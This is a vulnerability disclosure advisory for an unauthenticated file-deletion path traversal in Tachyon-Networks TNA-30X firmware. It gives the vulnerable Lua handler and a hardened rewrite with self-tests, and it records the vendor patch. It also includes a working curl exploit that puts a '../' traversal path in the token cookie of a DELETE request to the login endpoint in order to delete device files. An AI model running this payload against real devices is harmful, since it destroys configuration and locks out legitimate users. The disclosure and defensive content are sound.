Tachyon-Networks - Unauthenticated File Deletion Vulnerability

Overview

The HTTP DELETE handler of the login endpoint (/cgi.lua/login) does not validate the session token cookie before using it as a file name. The token is joined directly onto the session directory path, so a token containing directory traversal sequences (eg. token=../../../../etc/passwd) causes an arbitrary file on the device to be deleted, without any authentication.

This vulnerability can be used for denial of service: deleting configuration or web server files can crash or brick the device, or lock authorised users out of it.

Impacted Firmwares

This has been tested on TNA-30X firmware versions 1.11.4 and 1.12.0 (beta 1); both are vulnerable. Older firmware versions are also likely to be affected.

Exploit Steps

Run the payload below to delete the intended file. The path is relative to the session directory, hence the leading ../ segments; set TARGET to the address of the device.

# File to delete, relative to the session directory (hence the traversal)
FILE_TO_DELETE="../../../../tmp/etc/http/web-plain.json"
TARGET="192.168.1.1"
# No credentials are needed: the token cookie is used directly as a file name.
# -k accepts the device's self-signed certificate.
curl -i -s -k -X DELETE \
    -H "Host: $TARGET" \
    -b "token=$FILE_TO_DELETE" \
    "https://$TARGET/cgi.lua/login"

Vulnerable Code

Below is a sample of the code responsible for the vulnerability. This is a path traversal, not a command injection: the token cookie is passed unchanged to del_session, which joins it onto SESSION_DIR and only checks that the resulting path exists before removing it. Nothing verifies that the token is a bare session identifier, so ".." segments walk out of the session directory. Note that this sample reads the cookie named api_token, whereas the exploit above sets a cookie named token; use whichever cookie name the firmware build under test reads.

login.lua

--- Clears user authentication.
-- DELETE */login
-- Request params: no parms
-- Response:
-- - empty body (status code 204) on success,
-- - error message on failure.
local function auth_logout(req, res)
	local token = req.cookies["api_token"]
	if not token then
		return false, 400, "Token cookie is missing"
	end

	session.delete_session(token)
	security.erase_token(res)

	return { status = "ok" }
end

local function login(req, res)
	if req.method == "GET" then
		return auth_get(req, res)
	elseif req.method == "POST" then
		return auth_login(req, res)
	elseif req.method == "DELETE" then
		return auth_logout(req, res)
	else
		return false, 404, "No service"
	end
end

session.lua

--- Delete existing web session.
-- Checks and removes active session
-- @param session_id Session ID to look for
local function del_session(session_id)
	local session_file = path.join(SESSION_DIR, session_id)
	if not path.is_file(session_file) then
		return
	end

	sysio.remove_file(session_file)
end

local module = {
	...
	delete_session = del_session,
	...
}
return module
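The following is an added example of how del_session could be hardened. It is not Tachyon-Networks' code or their actual patch: SESSION_DIR, the helper names and the use of plain io/os calls instead of the firmware's path and sysio modules are assumptions made so that it runs under a stock Lua interpreter.

```lua
-- Added example (not the vendor's code): a hardened del_session that
-- rejects any session_id that is not a bare identifier and refuses to
-- delete anything outside SESSION_DIR. SESSION_DIR is an assumed location;
-- the real directory is not given on the page.
local SESSION_DIR = "/tmp/sessions"

-- Session IDs are opaque tokens: letters, digits, '-' or '_' only.
-- Slashes, dots, NUL bytes and the empty string are rejected outright.
local function is_valid_session_id(session_id)
	if type(session_id) ~= "string" then
		return false
	end
	if #session_id == 0 or #session_id > 128 then
		return false
	end
	return session_id:match("^[%w_%-]+$") ~= nil
end

-- Second, independent check (defence in depth in case the ID format is
-- loosened later): the joined path must start with SESSION_DIR .. "/" and
-- must not contain "." or ".." segments.
local function is_inside_session_dir(session_file)
	local prefix = SESSION_DIR .. "/"
	if session_file:sub(1, #prefix) ~= prefix then
		return false
	end
	for segment in session_file:sub(#prefix + 1):gmatch("[^/]+") do
		if segment == ".." or segment == "." then
			return false
		end
	end
	return true
end

-- Existence check using only the standard library (stands in for path.is_file).
local function file_exists(p)
	local f = io.open(p, "rb")
	if f then
		f:close()
		return true
	end
	return false
end

--- Delete existing web session (hardened).
-- @param session_id Session ID to look for
-- @return true if a session file was removed; false plus a reason otherwise
local function del_session(session_id)
	if not is_valid_session_id(session_id) then
		return false, "invalid session id"
	end
	local session_file = SESSION_DIR .. "/" .. session_id
	if not is_inside_session_dir(session_file) then
		return false, "path escapes session directory"
	end
	if not file_exists(session_file) then
		return false, "no such session"
	end
	local ok, err = os.remove(session_file)
	if not ok then
		return false, err
	end
	return true
end

-- Self-check against the advisory's payloads (run with: lua session_hardened.lua).
assert(not is_valid_session_id("../../../../etc/passwd"))
assert(not is_valid_session_id("../../../../tmp/etc/http/web-plain.json"))
assert(is_valid_session_id("a1b2c3d4e5f6"))
assert(not is_inside_session_dir(SESSION_DIR .. "/../etc/passwd"))
assert(is_inside_session_dir(SESSION_DIR .. "/a1b2c3d4e5f6"))
assert(select(2, del_session("../../../../etc/passwd")) == "invalid session id")

return { delete_session = del_session }
```

The caller in login.lua should also propagate the failure (return 400 rather than { status = "ok" }) so that a rejected token is visible in the server log; the example above returns the reason string for that purpose.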

Outcomes

After submitting the disclosure report to Tachyon-Networks the vulnerability was patched and new firmware released.

No CVE IDs have been assigned as of this post.

Affected Products:

Tachyon-Networks TNA and TNS series devices

Mitigation:

Update impacted devices to firmware version 1.11.5 or later.